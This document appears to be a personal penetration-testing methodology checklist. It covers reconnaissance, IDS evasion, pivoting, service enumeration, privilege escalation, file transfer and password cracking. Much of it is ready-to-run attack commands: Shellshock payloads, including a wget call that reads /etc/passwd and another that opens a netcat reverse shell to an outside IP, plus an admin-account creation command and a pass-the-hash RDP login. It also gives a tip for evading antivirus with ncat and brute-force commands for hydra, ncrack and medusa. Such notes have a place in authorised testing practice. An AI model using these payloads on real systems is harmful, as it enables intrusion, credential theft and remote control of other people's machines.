Methodology

DNS

☐ nslookup site.com
☐ nslookup -query=mx site.com
☐ nslookup -query=ns site.com
☐ nslookup -query=any site.com

☐ host -t ns site.com
☐ host -l site.com ns2.site.com

☐ dig site.com
☐ dig site.com A
☐ dig +nocmd shite.com MX +noall +answer
☐ dig +nocmd site.com NS +noall +answer
☐ dig +nocmd site.com A +noall +answer
☐ dig site.com +nocmd AXFR +noall +answer @dns_server.com Zone Transfer

☐ dnsrecon -d thinc.local -n 10.11.1.220 -t axfr -r 10.11.1.0/24
☐ dnsrecon -d site.com

Brute Force

☐ fierce -dns site.com
☐ fierce -dns site.com -dnserver ns1.site.com

☐ dnsenum site.com –dnsserver ns1.site.com
☐ dnsenum site.com -f /root/hostlist.txt

☐ dnsmap site.com

Network Scanning

☐ route * linux
☐ route print * windows
☐ arp
☐ arp-scan -l
☐ netdiscover -i eht0

☐ nmap -sn 10.11.1.* -sn = no port scan
☐ nmap -sL 10.11.1.* -Pn = no ping treat all host online
☐ nbtscan -r 10.11.1.0/24 -n = no DNS
smbtree
☐ hping3 -S –scan 1-1000 IP
☐ hping3 -S –scan ‘80,443,445,8080’ IP
☐ hping3 –scan 1-1000 IP NULL SCAN
☐ hping3 -2 –scan 1-1000 IP -V UDP SCAN
☐ hping3 -F -P -U -p 80 IP -c 3 -V XMAS SCAN

☐ masscan -p80,22,21,23,8080,10000 10.0.1.21 -i tun0 –rate

Individual Host Scanning

☐ nmap –top-ports 20 –open -iL iplist.txt
☐ nmap -O –osscan-guess IP * aggressive OS scan
☐ nmap -A -p- -T4 ip
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress
☐ nmap -sU -T4 -p <port> IP –max-retries=0
☐ hping3 -S IP -p 80 -c 4

Firewall / IDS Evasion

☐ nmap -sS -f IP *Packet Fragmnetaion
☐ nmap -sS -D [decoy 1] , [decoy 2] ,[decoy 3] , ME target IP *NOTE , you can not use Decoy with -sT -sV (these are full connect scans)
☐ nmap -sS -D 192.168.1.1, ME,192.168.1.23 TargetIP * ME is ME not as in ur ip
☐ nmap -sS -source-port 53 IP * use source port for ports that are blocked
☐ nmap -sS -g 80 10.10.10.024
☐ nmap -sS -g 53 -p 53 10.10.14.23
☐ nmap -s S -D RND:10 192.168.2.23 -p 80 -Pn –disable-arp-ping
☐ nmap -sS –spoof-mac apple 192.168.2.1 -p 80 -Pn –disable-arp-ping -n
☐ nmap –spoof-mac MAC U WANT 192.168.2.1 -p 80 -Pn –disable-arp-ping -n

PIVOTING

When scanning in a pivot you cannot scan UDP with nmap or it won’t work , scan tcp with no ping

☐ proxychains nmap –sTV –n –PN 192.168.78.25
☐ proxychains nmap -A -p 80,135,139,445,1101 10.185.10.55 -Pn
☐ proxychains nmap-T5 –top-ports=20 -sT -Pn 192.168.0.24
☐ proxychains nmap -sT -Pn -n 10.10.10.5 –top-ports 50

☐ ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1
• netstat -lntp
☐ ssh -f -N -R 2222:127.0.0.1:22 root@192.168.13.222

☐ sshpass -pMYPASSWORD sshuttle -r user@192.168.1.2 192.168.0.0/24 10.0.0.0/24

Service Scanning

WebApp

☐ view source
☐ Cewl
• cewl
Nikto
dirb
☐ gobuster
☐ dirbuster
☐ dirsearch
• ./dirsearch.py -u http://192.168.13.29/ -e cgi -r
wpscan
☐ dotdotpwn

☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test
☐ SQLi
☐ XSS
☐ Shellshock
• env x=‘() { :;}; echo vulnerable’ bash -c “echo this is a test”
• User-Agent: () { :;}; ping -c 5 -p unique_string attacker.machine
• wget -U “() { foo;};echo \”Content-type: text/plain\”; echo; echo;/bin/cat /etc/passwd” http://192.168.13.29/cgi-bin/login.cgi && catlogin.cgi
• wget -U “() { foo;};echo; /bin/nc 192.168.13.18 1234 -e /bin/sh” http://192.168.13.29/cgi-bin/login.cgi

Linux\Windows

☐ snmpwalk -c public -v1 ipaddress 1
• snmpwalk -v 2c 192.168.2.23 -c public

☐ Windows =
• nbtscan -v IP or IP range
• nbtstat -a IP
• net view IP
• net use K: \\192.168.2.23\C
• net use \\192.168.2.23\IPC$ “” /u:” ”

☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
• kali# mkdir -p /mnt/home/bob
• mount -t nfs :/home/bob /mnt/home/bob -o nolock

☐ mount.cifs //192.168.2.23/C /media/K_share/ user=,pass=
☐ mkdir /mnt/www
☐ mount -t cifs \\\\192.168.13.26\\www /mnt/www
☐ rpcinfo
☐ rpcclient -N -U “” 192.168.2.23
• rpclient$> enumdomusers
• enumalsgroups , srvinfo , lookupnames , queryuser , enumprivs
☐ Enum4Linux
☐ smbmap -H 192.168.13.26

☐ SMTP
• smtp-user-enum -M VRFY -U users.txt -t 10.10.10.10
• smtp-user-enum -M EXPN -u admin1 -t 10.10.10.10
• smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
• smtp-user-enum -M EXPN -D site.com -U users.txt -t 10.10.10.10

Anything Else

nmap scripts (locate *nse* | grep servicename)
▪ nmap –script-updatedb
• nmap –script smb-enum-shares IP -p 445
• nmap –script auth IP will run all scripts in auth catagory
• nmap –script default IP Run defualt scripts
• nmap -p389 –script=ldap-search
• nmap –script smb-os-discovery -p445 192.168.13.29
• nmap -sU -p 161 192.168.2.23 –script snmp-brute
• nmap -sU -p 161 –script-args snmp-brute.communities.db= WORDLIST
• nmap -sU -p 161 192.168.102.149 –script snmp-brute –script-argssnmp-brute.communitiesdb=/usr/share/seclists/Misc/wordlist-commonsnmp-community-strings.txt
• nmap –script nfs-ls,nfs-showmount,nfs-statfs
• nmap –script rpc-grind,rpcinfo 192.168.13.26 –p 111
• nmap –script smtp-commands 192.168.13.26 -p 25
• nmap –script http-shellshock –script-args uri=/cgi-bin/login.cgi 192.168.13.29 -p 80
• nmap –script ssl-heartbleed 192.168.13.58

☐ MSF Aux Modules

☐ Wireshark
• !(arp or icmp or dns)
• http
• http.request
• tcp contains XXX
• tcp.flags.reset==1
• tcp.port==80
• ip.addr==10.10.10.10 && ip.addr=10.10.10.1
• http.request.method == “POST”

☐ Download the software

Exploitation
☐ Gather Version Numbes

☐ Searchsploit

☐ Default Creds

☐ Creds Previously Gathered

☐ Download the software

Post Exploitation

Linux

☐ lsb_release , uname , lscpu
☐ ptrace
☐ Dump login creds
https://github.com/huntergregal/mimipenguin

☐ linux-local-enum.sh
• wget https://highon.coffee/downloads/linux-local-enum.sh
☐ LinEnum.sh
https://github.com/rebootuser/LinEnum.git
☐ lse.sh
https://github.com/diego-treitos/linux-smart-enumeration.git

• wget “https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh” -O lse.sh
curl “https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh” -o lse.sh

☐ linuxprivchecker.py
https://github.com/sleventyeleven/linuxprivchecker.git
☐ linux-exploit-suggestor.sh
https://github.com/mzet-/linux-exploit-suggester.git
☐ unix-privesc-check.py
https://github.com/pentestmonkey/unix-privesc-check.git

☐ FIND EXECUTABLES

• grep -r “password” * 2>&1 /dev/null

• find -type f -executable -exec file -i ‘{}’ \; | grep ‘x-executable; charset=binary’

• find / -executable -type f 2> /dev/null | egrep -v “^/bin|^/var|^/etc|^/usr” | xargs ls -lh | grep Aug

• find / -perm -0002 -type f -print 2<dev/null

• find / -perm -2 ! -type l -ls 2>/dev/null

• find /* -user root -perm -4000 -print 2>/dev/null

• find / -perm -4000 2>/dev/null

• find / -perm -u=s -type f 2>/dev/null

• find / -perm -1000 -type d 2>/dev/null # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.

• find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) – run as the group, not the user who started it.

• find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) – run as the owner, not the user who started it.

• find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID

• for i in `locate -r “bin$”`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

• find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Cron Jobs:

☐ /var/spool/cron/crontabs/root

Windows

☐ sysinfo Get architecture , domain name , hotfixes and so on

☐ wpc.exe
☐ windows-exploit-suggestor.py
windows_privesc_check.py
☐ windows-privesc-check2.exe

https://download.sysinternals.com/files/SysinternalsSuite.zip systernals win tools

accesschk.exe -uwcqv “Authenticated Users” *
accesschk -qwsu “Everyone” c:\
• dir -s -h -r /s /d *.*
• attrib -s -h -r /s /d *.*
• dir /a:hd C:\folder\
• dir/a should show hidden folders.
• dir /a:d shows all directories
• dir /a:h shows all hidden files.
Try dir /adh (without the colon) to combine.

• C:\> dir backup* /s /p

Logs to Check

Linux = to do


Windows = to do


Priv Escalation
acesss internal services (portfwd)

☐ add account
• net user dude pass /ADD
• net user dude Administrator /ADD

Windows

☐ List of exploits
☐ Pass the Hash
☐ PTH with RDP xfreerdp /u:admin /d:foocorp /pth:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41 /v:172.16.22.119
☐ whoami /priv
☐ unquoted service paths
• C:\> wmic service get name,displayname,pathname,startmode |findstr/i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””

• sc qc <service name>
• net start # check enables services
• net share
• net localgroup
• net local group Administrators
• net user /domain
• net group “Domain Controllers” /domain

• service –status-all
• wmic service get Caption,StartName,State,pathname
• wmic service where ‘Caption like “Remote%” and started=true’ get Caption
• msf> use exploit/windows/local/trusted_service_path

Linux
☐ sudo su
☐ sudo -l
☐ !sh
☐ less (!sh)
☐ more (!sh)
☐ VI/VIM (:!sh)
☐ Nmap (–interactive +!sh)
☐ ftp (!sh)
☐ gdb (!sh)
☐ python
☐ Perl
☐ Irb
☐ lua
☐ su bash
☐ su /bin/bash
☐ sudo nmap –interactive
☐ KernelDB
☐ Searchsploit

Compiling Exploits

☐ gcc -m32 -o linuxpriv exploit.c # for 32 bit systems
☐ i586-mingw32msvc-gcc -o sciaccess.exe useradd.c

Final

☐ Dump hashes
☐ Dump SSH Keys
☐ Dump GPP creds
☐ Plain Txt passwords

ADDITIONAL

File Transfers

☐ Netcat :
• C:\Desktop > nc.exe -nvlp 4444 > shell.exe
• root@kali:~# nc -nv 10.11.11.75 < /root/Documents/shell.exe

* Use ncat to encrypt to help keep from gettting stopped by AV
• C:\Desktop> ncat –exec cmd.exe –allow 10.11.0.32 -vnl 4444 –ssl
• Kali:~# ncat -v 10.11.11.75 4444 –ssl

☐ SCP :
• scp file.txt root@10.10.10.14:file.txt * Ip is the machine you are sending the file

☐ SMB :
• root@box:~# python smbserver.py SHARE /tmp/smb-transfer
• C:\Documents and Settings\user>copy \\192.168.2.8\SHARE\test.txt
\

☐ RDP :
• root@box:/tmp/smbshare# rdesktop 192.168.2.202 -r disk:share=/tmp/share/
You will be able to login once the credentials requested by the remote system are provided. Search for “My Computer” and you’ll see the shared folder in a network device:
Double click “My Computer”, then you can see all files located in /tmp/share/ . You can execute, copy, edit or do operations on them:

Passwords and Cracking

Online Cracking

https://hashes.org/search.php
https://hashkiller.co.uk/Cracker/MD5
https://gchq.github.io/CyberChef/

☐ Cewl -d 2 -m 5 -w savedfile.txt 192.168.1.33

☐ Hydra
• hydra 10.10.10.86 http-post-form -e nsr -t 16 -u -f -m “/login:username=^USER^:password=^PASS^:submit=Login” -l admin -P darkc0de.txt -vv
• hydra -l admin -P passwd.txt -v 192.168.19.203 ftp
• hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
• hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect:H=Cookie: security=low; PHPSESSID=<phpsessid>”

☐ Ncrack
• ncrack -v -f –user admin -P passwd.txt rdp://192.168.19.202,CL=1
• ncrack –user fairy -P /root/Desktop/rockyou.txt rdp://10.0.2.4 -vv
• ncrack telnet://10.10.10.130:25
• ncrack ssh://10.10.10.130 telnet://10.10.10.60:218
• ncrack 10.10.10.10,15 –p ssh:50,telnet

☐ Medusa
• medusa -h 192.168.102.149 -M telnet -U username.lst -P password.lst
• medusa -h 192.168.19.203 -u admin -P password.txt -M http -m DIR:/admin -T 20

☐ Patator
• patator ssh_login host=10.0.0.1 user=root password=FILE00=passwords.txt -x ignore:mesg=’Authentication failed.’
• patator ssh_login host=192.168.102.155 user=FILE0password=FILE1 0=username.lst 1=password.lst

☐ JTR

• unshadow passwd shadow > file_to_crack
• ./john -single file_to_crack
• ./john -w=location_of_dictionary_file -rules file_to_crack
• ./john -show file_to_crack
• ./john –incremental:All file_to_crack

☐ FCRACKZIP

• Check Zip properties 7z l -slt /root/Desktop/personal.zip ( 7z l – s l t )

• fcrackzip -v -b -p ‘/root/Desktop/rockyou.txt’ -u ‘/root/Desktop/flag-zip3.zip’ -Dp wrdlis.txt also
• fcrackzip -D -p’/usr/share/wordlists/rockyou.txt’ ‘/root/flag-gold.zip’ -v -u
• fcrackzip -v -D -u -p tommy.list t0msp4ssw0rdz.zip
• fcrackzip -v -u -l 4-8 -c aA1 /root/locked.zip Brute force 4- 8 chars